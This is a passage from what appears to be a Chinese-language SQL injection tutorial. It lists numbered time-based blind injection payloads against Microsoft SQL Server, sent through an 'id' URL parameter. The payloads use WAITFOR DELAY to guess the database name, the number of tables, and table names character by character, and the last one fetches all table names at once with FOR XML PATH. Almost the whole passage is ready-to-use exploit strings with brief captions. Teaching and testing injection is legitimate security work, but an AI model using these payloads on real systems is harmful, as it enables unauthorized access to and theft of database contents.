(4)猜解当前数据库名的第三个字符-payload4:
?id=1 IF ASCII(SUBSTRING(DB_NAME(),3,1))=100 WAITFOR DELAY '0:0:5'
(5)猜解当前数据库名的第四个字符-payload5:
?id=1 IF ASCII(SUBSTRING(DB_NAME(),4,1))=108 WAITFOR DELAY '0:0:5'
(6)猜解当前数据库的表个数-payload6:
?id=1 IF (SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb')=4 WAITFOR DELAY '0:0:5'
(7)猜解当前数据库的第一个表名长度-payload7:
?id=1 IF len((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb'))=3 WAITFOR DELAY '0:0:5'
(8)猜解当前数据库的第一个表的第一个字符-payload8:
?id=1 IF SUBSTRING((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb'),1,1)=CHAR(99) WAITFOR DELAY '0:0:5'
# 依此类推,猜解出mydb库的第一个表名为cmd
(9)猜解当前数据库的第二个表名长度-payload9:
?id=1 IF len((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' and table_name!='cmd'))=8 WAITFOR DELAY '0:0:5'
(10)猜解当前数据库的第二个表的第一个字符(排除第一个表,之后再取top 1)-payload10:
?id=1 IF SUBSTRING((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' and table_name!='cmd'),1,1)=CHAR(116) WAITFOR DELAY '0:0:5'
一次查询mydb库的所有表长度-payload:
?id=1 IF len((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' FOR XML PATH))=163 WAITFOR DELAY '0:0:5'